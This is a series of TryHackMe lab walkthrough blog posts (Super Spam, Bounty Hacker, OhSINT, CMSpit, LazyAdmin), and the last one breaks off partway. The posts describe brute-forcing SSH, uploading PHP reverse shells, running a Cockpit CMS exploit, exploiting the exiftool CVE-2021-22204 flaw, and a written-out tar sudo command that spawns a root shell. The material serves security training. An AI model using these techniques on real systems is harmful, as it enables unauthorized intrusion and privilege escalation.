Well well. Looks like Lucy's a traitor :D And they are using XOR encryption to communicate. The folder also a file xored.py that allows you to XOR two images and output a result image.

Finding the answers for the "encryption" questions

The folder has ten files of the type cX.png, where X ranges from 1-10. And then a d.png.

My guess is we can use the xored.py script to remove the overlay(which was added as part of encryption probably), to make the underlying text more clearer.

The encryption process is not intuitive, since we don't know what the "key" file is.

As for how XOR Encryption works, read the "Example" section of this Wikipedia page => https://en.wikipedia.org/wiki/XOR_cipher

So, technically speaking. "Original Message" XOR "Encryption Key" => "Encrypted Message"

Also, "Encrypted Message" XOR "Encryption Key" => "Original Message"

The machine has Python3. So starting a web-server to download all the files so that we can do the work on our own machine. I was able to start the server on port 8080 and download the files.

Looking at the files on my own system.

d.png is the clearest image of all the four. It has some underlying text, over which some Lorem Ipsum text has been super-imposed, which I am guessing is the result of a XOR operation.

The cX.png files are not legible. The d.png is as follows.

I did not run the XOR Encryption. Just opened the file in an Image Viewer, and zoomed in as much as possible, and then typed out the message, which is

Senior Favaeull, I am sending you this encrypted message so that you can maintain your persistence on the machine. Please be assured that I have encypted this message using Xor. I have told that clumsy assistant of mine to use different random keys for each message sent. I hope this finds you well. The new password will grant you access, it is the following: CENSORED. stay safe and well.

-Super Spam

To be absolutely sure about the password(especially the first half), I tried running xored.py for the cX.png files against each other. I got a good result for c8.png XOR c4.png.

In the TryHackMe room, the password we obtain in this step is the answer for

Q: What key information was embedded in one of super-spam's encrypted messages?

Now, who the hell is Favaeull? The "clumsy assistant" mentioned here is clearly Lucy.

Tried this password all users on the SSH port 4012.

Success! It works for donalddump. Now we have a proper shell.

3) Privilege Escalation

We can finally look into the /home/donalddump/ dir. We cannot change into the home dir initially. This is due to lack of execute permissions. Just execute chmod u+x donalddump and get in.

Now there is a strange passwd file here. It has some bytes. Try reading it in vim, and this is what you see.

Now I did not know what to make of this. Probably encoding/encryption of some kind.

I kept this aside, and ran the linPEAS.sh script to find PrivEsc vectors.

That's when I came across this strange entry in the process list in the linPEAS results

You might wonder why this caught my eye. If you scroll up to the beginning, and look at the nmap enumeration, you will see we have a VNC service running at port 5901, which we haven't used for anything yet.

Also another entry that caught my eye, that will be useful later on.

Those lines are from the machine's /etc/ssh/sshd_config file => https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh#L2314

So root login via SSH is allowed. Good thing to keep in mind.

Finding a way to connect to the VNC service

So now, I am guessing this is a password file for the VNC service. Let's try to find some details.

So Startpage search for "vnc passwd file" => https://www.tightvnc.com/vncpasswd.1.php

So I am thinking, since we can't get the original password, why not try to change the password. The vncpasswd command is available on the machine. But when we try to run it, it asks for a password.

donalddump@super-spam:~$ vncpasswd 
Using password file /home/donalddump/.vnc/passwd
VNC directory /home/donalddump/.vnc does not exist, creating.
Password: 
Password too short

Since this is my first time dealing with TightVNC, I assume maybe I can try to set a new password. So I do a search for "change vnc password", and I come across this article => https://linuxconfig.org/how-to-change-vnc-password-on-linux

After reading this article, it dawns on me that this is an encrypted password, which is the output of the vncpasswd command. Ok. Now search for "decrypt vnc password".

And I find https://github.com/jeroennijhof/vncpwd. A very convenient utility to help you decrypt the password.

And we have the VNC Service password! Let's try connecting to it.

Aaaand we have root shell! But there is no root flag in the home dir.

Finding the root.txt file

This VNC session is very inconvenient to navigate around. If you remember from earlier, this machine allows root login via SSH. So let's generate some SSH keys to enable private key login.

Run below commands on remote machine

ssh-keygen to generate keys
cd /root/.ssh/ && cat id_rsa.pub > authorized_keys
Run Python3 webserver and download private key file id_rsa onto your machine

On your local machine(assuming Kali)

sudo chown kali:kali id_rsa
sudo chmod 600 id_rsa

Now use this key file to login to the machine using the SSH Service at port 4012.

Executing an ls -laR in the root home dir yields the following.

So the root flag is in /root/.nothing/r00t.txt. Note the zeroes in the file name.

The contents are as follows:

We will have to decode it to get the answer. This was obviously not Base64. I initially tried https://rot13.com/ but that did not yield anything.

This is where @tan on the THM Discord server gave me a hint about trying to use GCHQ CyberChef magic formula to try and guess what kind of encoding this was.

Aaand done!! Whew what a ride that was. Thanks for reading!

Seriously recommend trying the machine yourself => https://tryhackme.com/room/superspamr

TryHackMe Bounty Hacker Room Walkthrough

Krishna — Sat, 07 Aug 2021 09:09:34 +0000

https://tryhackme.com/room/cowboyhacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

1) Enumeration / Service Discovery

# Nmap 7.91 scan initiated Mon Jul 26 08:17:23 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.61.20
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds.  Ignoring time.
Nmap scan report for 10.10.61.20
Host is up, received user-set (0.16s latency).
Scanned at 2021-07-26 08:17:24 IST for 800s
Not shown: 55529 filtered ports, 10003 closed ports
Reason: 55529 no-responses and 10003 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.9.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQj
CajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
|   256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

2) Foothold

Observations

Port 80 - Apache 2.4.18
Home page seems to have a big image from the Cowboy Bebop anime. Which seems to be stored in the /images/ dir. Visiting that dir shows that dir listing allowed. Running feroxbuster on the web portal in parallel.

FTP Anon login allowed. Got two files -> locks.txt and tasks.txt.

└─$ ftp 10.10.61.20                                                                  
Connected to 10.10.61.20.                                                                                                                                                  
220 (vsFTPd 3.0.3)                                                                                                                                                         
Name (10.10.61.20:kali): Anonymous                                                                                                                                         
230 Login successful.                                                                
Remote system type is UNIX.                                                          
Using binary mode to transfer files.                                                 
ftp> ls                                                                              
200 PORT command successful. Consider using PASV.                                    
150 Here comes the directory listing.                                                                                                                                      
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt                    
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt                     
226 Directory send OK.

tasks.txt

1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

Q3: Who wrote the task list?

A3: lin

locks.txt seems to contain a what looks like a list of passwords.

Let's try to bruteforce ssh with the probable password list provided and the username lin

└─$ hydra -l lin -P locks.txt ssh://10.10.61.20
[22][ssh] host: 10.10.61.20   login: lin   password: CENSORED

Success!

Q4: What service can you bruteforce with the text file found?
A4: SSH

Q5: What is the users password?
A5: Result of ssh bruteforce using hydra

Let's ssh into the machine with this username/password combo. This allows us to get user.txt

Q6: user.txt
A6: Answer in /home/lin/user.txt

Now we have a proper foothold in the machine.

3) Privilege Escalation

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

So we can run tar as root user. Note the absence of NOPASSWD here. You will still need the lin user`s password to do this. Fortunately we have that.

Using Tar GTFOBins for Privilege Escalation

lin@bountyhacker:~/Desktop$ sudo tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
# id
uid=0(root) gid=0(root) groups=0(root)

Use this shell to navigate to /root/ and get the root flag.

Q7: root.txt
A7: Answer in /root/root.txt

Pretty simple box to solve. Thanks for reading!

Try it at https://tryhackme.com/room/cowboyhacker

TryHackMe OhSINT Room Walkthrough

Krishna — Sat, 07 Aug 2021 08:32:18 +0000

https://tryhackme.com/room/ohsint

Are you able to use open source intelligence to solve this challenge?

First step is download the task files. Task file looks like the standard Windows XP wallpaper

Q1: What is this users avatar of?

What user? Let's look at the hint.

Hint says exiftool is your friend. Who is the author of the image? Do they have any social media accounts?

Hmm ok then. Let's run exiftool on the file and see if we can find any user info in it.

Interesting. Let's use a search engine if we can any social media accounts for this "OWoodflint".

Awesome. We have found a Twitter and one of their GitHub repos.

Twitter -> https://twitter.com/OWoodflint

Github -> https://github.com/OWoodfl1nt/people_finder

Take note of ALL the important stuff you see in the above screenshots. They will come in handy at a later stage.

So, we can finally answer Q1 about the user's avatar, based on their Twitter profile pic.

A1: Cat

Q2: What city is this person in?
Hint: BSSID + Wigle.net

Once again, the question on its own does not make any sense to an OSINT noob like me. So had to take a look at the hint.

If you'll look at the Twitter account screenshot above, the second screenshot does have a BSSID(unique hardware MAC address for that particular wireless router).

Now, looking at the hint, let's visit wigle.net. It seems to be a website which allows us to search user-contributed data on wireless networks around the world for our BSSID, and then pinpoint its location.

First, we'll need to register on the website before running a search.

Zoom out of the map, paste the BSSID in the BSSID search box, and then click on Filter. You will see a small ring around London. Keep zooming in, until you see the SSID name.

So, now we can answer

Q2: What city is this person in?
A2: London

Q3: Whats the SSID of the WAP he connected to?
A3: UnileverWiFi

Q4: What is his personal email address?
A4: OWoodflint@gmail.com

Answer for Q4 found earlier in the README of their Github repo

Q5: What site did you find his email address on?
A5: GitHub

Q6: Where has he gone on holiday?

Now, this was truly confusing. After running a couple more searches, finally found a link that appears to be their blog.

Link to Blog => https://oliverwoodflint.wordpress.com/author/owoodflint/

Post content says "Im in New York right now, so I will update this site right away with new photos!". So probably on a vacation.

Q6: Where has he gone on holiday?
A6: New York ( Found on his blog )

Q7: What is this persons password?

Frankly I had no idea, until I went to that blog post again, and saw that weird string at the end of the blog post.

Q7: What is this persons password?
A7: pennYDr0pper.!

Thanks for reading. This was a fun goose chase, and a great introduction to OSINT.

Try the room at https://tryhackme.com/room/ohsint

TryHackMe CMSpit Room Walkthrough

Krishna — Thu, 05 Aug 2021 16:49:40 +0000

https://tryhackme.com/room/cmspit

This is a machine that allows you to practise web app hacking and privilege escalation using recent vulnerabilities.

Let's enumerate the machine first using nmap

# Nmap 7.91 scan initiated Mon Aug  2 11:52:56 2021 as: nmap -p- -A -Pn -oN resultsNmap -vv 10.10.50.229
Nmap scan report for 10.10.50.229
Host is up, received user-set (0.16s latency).
Scanned at 2021-08-02 11:52:58 IST for 390s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD7acH8krj6oVh6s+R3VYnJ/Xc8o5b43RcrRwiMPKe7V8V/SLfeVeHtE06j0PnfF5bHbNjtLP8pMq2USPivt/LcsS+8e+F5yfFFAVawOWqtd9tnrXVQhmyLZVb+wzmjKe+BaNWSnEazjIevMjD3bR8YBYKnf2BoaFKxGkJKPyleMT1GAkU+r47m2FsMa+l7p79VIYrZfss3NTlRq9k6pGsshiJnnzpWmT1KDjI90fGT6oIkALZdW/++qXi+px6+bWDMiW9NVv0eQmN9eTwsFNoWE3JDG7Aeq7hacqF7JyoMPegQwAAHI/ZD66f4zQzqQN6Ou6+sr7IMkC62rLMjKkXN
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEnbbSTSHNXi6AcEtMnOG+srCrE2U4lbRXkBxlQMk1damlhG+U0tmiObRCoasyBY2kvAdU/b7ZWoE0AmoYUldvk=
|   256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKYUS/4ObKPMEyPGlgqg6khm41SWn61X9kGbNvyBJh7e
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C9CD46C6A2F5C65855276A03FE703735
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
|_http-trane-info: Problem with XML parsing of /evox/about

So we have two ports open.

Port 22 - OpenSSH 7.2p2
Port 80 - Apache httpd 2.4.18 webserver

Let's visit the website hosted on the target machine.

Q1: What is the name of the Content Management System (CMS) installed on the server?
A1: Cockpit

The login portal has the name shown. Let's take a look at the source code of the home page.

Q2: What is the version of the Content Management System (CMS) installed on the server?
A2: 0.11.1

We can guess the version by looking at the "ver=" parameter appended to multiple CSS/JS asset URLs in the login page source.

Q3: What is the path that allow user enumeration?
A3: /auth/check

POST request sent to this URL when login attempt is made. Although UI says login failed, JSON response says "user not found". Therefore it can be used for username enumeration.

Strange behaviour noticed with password reset form when trying username admin

Looks like admin is a username. Path used by CMS to check this is /auth/requestreset.

I would say /auth/requestreset can also be used for username enumeration.

Tried username fuzzing on /auth/check. Same response for admin as it is for everything else. Will try fuzzing on /auth/requestreset instead. Using ZAP Proxy's Fuzz feature for this.

No luck.

Searching for exploits for Cockpit CMS on the Internet, I found a Metasploit module written by Packet Storm Security for this exact version => https://packetstormsecurity.com/files/162282/Cockpit-CMS-0.11.1-NoSQL-Injection-Remote-Command-Execution.html

More details regarding the exploits(CVE-2020-35846 and CVE-2020-35847) from the author of the module => https://swarm.ptsecurity.com/rce-cockpit-cms/

Looking at the exploit and the article, it seems the CMS uses MongoDB as its backend database.

Trying this in Metasploit

Configuring options and running the exploit

Wow this is one handy exploit :D. It managed to get user-info and even changed the password for the admin user.

Thanks to the exploit, we can answer some of the questions now

Q4: How many users can you identify when you reproduce the user enumeration attack?
A4: 4

Q5: What is the path that allows you to change user account passwords?
A5: /auth/requestreset

You can see the above URL path in the Metasploit exploit code.

Next question is about Skidy's email, which is not the same as admin user email. Let's answer that later once we have it.

Now, the exploit reset the password for the admin account on the CMS and printed it out. Let's use it to login.

Admin login successful!

In the admin dashboard, we can go to account settings (http://MACHINE-IP/accounts/account), then choose "Accounts" in the breadcrumb at the top of the page. Here we see the emails for all the users, including Skidy's as well.

Q6: Compromise the Content Management System (CMS). What is Skidy's email.
A6: s$$$y@t$$$$$$$e.f$$$$$il

Q7: What is the web flag?
A7: $CENSORED$

To find the web flag, click on banner aka Cockpit logo -> Finder. The flag is in one of the files.

Since this is a CMS, we should be able to upload a PHP reverse shell file. Use the same Finder menu that we used earlier to upload it. On a Kali machine, you can find it at /usr/share/webshells/php/

I uploaded it to /storage/uploads/ and accessed it at http://machine-ip/storage/uploads/evilshell.php

We have the reverse shell. Contents of /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:Coock,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mongodb:x:109:65534::/var/lib/mongodb:/bin/false
clamav:x:110:118::/var/lib/clamav:/bin/false
debian-spamd:x:111:119::/var/lib/spamassassin:/bin/sh
opensmtpd:x:112:120:OpenSMTD Daemon,,,:/var/lib/opensmtpd/empty:/bin/false
opensmtpq:x:113:121:OpenSMTD queue user,,,:/var/lib/opensmtpd/empty:/bin/false
www-data@ubuntu:/$ cat /etc/login.defs | grep UID
UID_MIN                  1000
UID_MAX                 60000

So stux is the only non-root user. Listing their home dir

The user.txt is there, but we can't read it as www-data. Also a .mongorc.js that has 777 permissions. There is also a .dbshell file here which we can read. We know from the Metasploit module that we used earlier that this machine has a MongoDB server running.

According to MongoDB Docs, this stores the command history. Let's see what's inside.

Oooh! We seem to have found the MongoDB credentials for the stux user. And a flag that is stored in the DB.

With this we can answer another question

Q8: Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?
A8: Answer in /home/stux/.dbshell

Note: We did not actually have to login to the DB to get the flag, although that also seems to be possible.

Now, its very probable the user re-used the password for MongoDB and SSH. So let's try to login to ssh with the credentials for stux we found in .dbshell

Successful login. So we now we can answer

Q9: What is the user.txt flag?

Since the ssh password is a bit complicated, setting up ssh keys for easier login.

Now that we have a foothold in the machine. Let's try for privilege escalation.

Looks like we can use sudo to execute exiftool as root with no password. Let's see if GTFOBins has an entry for this.

Yes it does => https://gtfobins.github.io/gtfobins/exiftool/#sudo

But I'm not really sure how to achieve privesc with this exploit. It seems we can read files that we normally do not have access to and move them to a location of our choice.

Note: We can use this method to get our root flag.

Let's try using a search engine to see there are any recent privesc exploits for exiftool.

Looks like there was CVE-2021-22204 that was originally disclosed on HackerOne. Looks like the reporter was able to use a modified DjVu file uploaded to Gitlab to get a reverse shell on their machine.

Original Reporter's blog post on this => https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

It seems the exploit makes use of a particular vulnerable function in exiftool's code that is responsible for parsing the metadata of the DjVu file, which can then be made to execute arbitrary code.

Looks like something we can use to escalate privileges, since we can execute exiftool with sudo permissions.

The article that I used as a guide to make the exploit work => https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/

Verifying that the exploit works

It works! Now, let's use this to copy bash into /tmp/ and set its SUID bit.

Note: The required dependencies are installed on the target machine, so we are making use of them. In a real scenario, you will need to install djvulibre-bin as instructed in the blog post.

And now let's use this to get the root flag

So answering the remaining questions

Q10: What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000
A10: CVE-2021-22204

Q11: What is the utility used to create the PoC file?
A11: djvumake

Q12: Escalate your privileges. What is the flag in root.txt?
A12: Use root shell to get the flag in /root/root.txt

Thanks for reading!

This room was super-fun to solve. I recommend you try it as well => https://tryhackme.com/room/cmspit

TryHackMe LazyAdmin Room Walkthrough

Krishna — Sat, 31 Jul 2021 10:17:33 +0000

https://tryhackme.com/room/lazyadmin

Easy linux machine to practice your skills

1) Enumeration

# Nmap 7.91 scan initiated Mon Jul 26 09:12:46 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv 10.10.42.242
adjust_timeouts2: packet supposedly had rtt of -2295969 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2295969 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2297756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2297756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2296971 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -2296971 microseconds.  Ignoring time.
Nmap scan report for 10.10.42.242
Host is up, received user-set (0.14s latency).
Scanned at 2021-07-26 09:12:46 IST for 532s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE    REASON         VERSION
22/tcp open  ssh        syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  tcpwrapped syn-ack ttl 60
|_http-title: "Apache2 Ubuntu Default Page: It works"

2) Foothold / Getting a shell

Observations. Only two services. SSH and Apache webserver.

Port 22 - OpenSSH 7.2p2

└─$ searchsploit openssh 7.2p2
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                                 | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                           | linux/remote/45210.py
OpenSSH 7.2p2 - Username Enumeration                                                                                                     | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                                     | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                                 | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                                     | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                                    | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's get back to this later

Port 80 - Webserver - Apache 2.4.1

Result of feroxbuster scan
feroxbuster -u http://10.10.42.242 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php --extract-links

301        9l       28w      314c http://10.10.42.242/content                                                                                                              
301        9l       28w      321c http://10.10.42.242/content/images                                                                                                       
200       36l      151w     2198c http://10.10.42.242/content/index.php                                                                                                    
200       15l       74w     3338c http://10.10.42.242/icons/ubuntu-logo.png                                                                                                
301        9l       28w      318c http://10.10.42.242/icons/small                                                                                                          
200      375l      968w    11321c http://10.10.42.242/index.html                                                                                                           
200      166l      644w     5108c http://10.10.42.242/icons/README                                                                                                       
301        9l       28w      317c http://10.10.42.242/content/js                                                                                                          
200        3l        8w      176c http://10.10.42.242/icons/small/folder.png

Ignoring contents of /icons/small/* since those are part of standard Apache installation

301        9l       28w      318c http://10.10.42.242/content/inc
200        0l        0w        0c http://10.10.42.242/content/inc/db.php
301        9l       28w      317c http://10.10.42.242/content/as
301        9l       28w      324c http://10.10.42.242/content/inc/cache
301        9l       28w      323c http://10.10.42.242/content/inc/lang
200        7l       28w     1553c http://10.10.42.242/content/images/captcha.php
200        0l        0w        0c http://10.10.42.242/content/inc/alert.php
200        0l        0w        0c http://10.10.42.242/content/inc/function.php
301        9l       28w      325c http://10.10.42.242/content/attachment
200        0l        0w        0c http://10.10.42.242/content/inc/404.php
200        0l        0w        0c http://10.10.42.242/content/inc/rssfeed.php
301        9l       28w      321c http://10.10.42.242/content/as/lib
200        0l        0w        0c http://10.10.42.242/content/as/lib/category.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/main.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/media.php
301        9l       28w      320c http://10.10.42.242/content/as/js
200        0l        0w        0c http://10.10.42.242/content/as/lib/post.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/comment.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/information.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/ad.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/license.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/install.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/update.php

Webserver is a mess. Dir listing enabled. PHP files available for everyone to see(not useful as we can only see interpreted results). Also means MySQL/DB installation on remote machine.

Webpage at http://10.10.42.242/content/ says Welcome to SweetRice - Thank your for install SweetRice as your website management system. Looks like some sort of CMS

Link to docs for after-install config on home page => https://www.sweetrice.xyz/docs/5-things-need-to-be-done-when-SweetRice-installed/

At http://10.10.42.242/content/inc/

At http://10.10.42.242/content/as/ , some kind of admin portal

Ok, let's look for some exploits

└─$ searchsploit sweetrice    
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                           |  Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion                                                                                                  | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                                                                               | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                                                                                | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                                                                                  | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                                                                      | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                                                             | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                                                        | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                                                                    | php/webapps/14184.txt
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Trying to get the version of the CMS, but unable to. Would be great if we could use an arbitrary file upload exploit to get a reverse shell.

In the previous screenshot, we saw a "mysql_backup" folder, which seems to have a backup file. Let's download it and see if we can get some user creds.

Seems like a PHP script that contains a DB SQL schema for the CMS system. There is one statement that contains values to be inserted. In that we find

"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"

So the admin username is manager? And their password hash is that 32-character string? Probably. Let's use Crackstation to crack that hash

Success. its an MD5 hash for CENSORED. Lets try manager:*CENSORED* on the admin portal we found earlier.

SUCCESS!! We have logged in as admin.

We also have the version as 1.5.1. Let's try to use the Aribtrary File Upload exploit

Lets try to upload a PHP reverse shell from /usr/share/webshells/php after configuring IP and port.

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
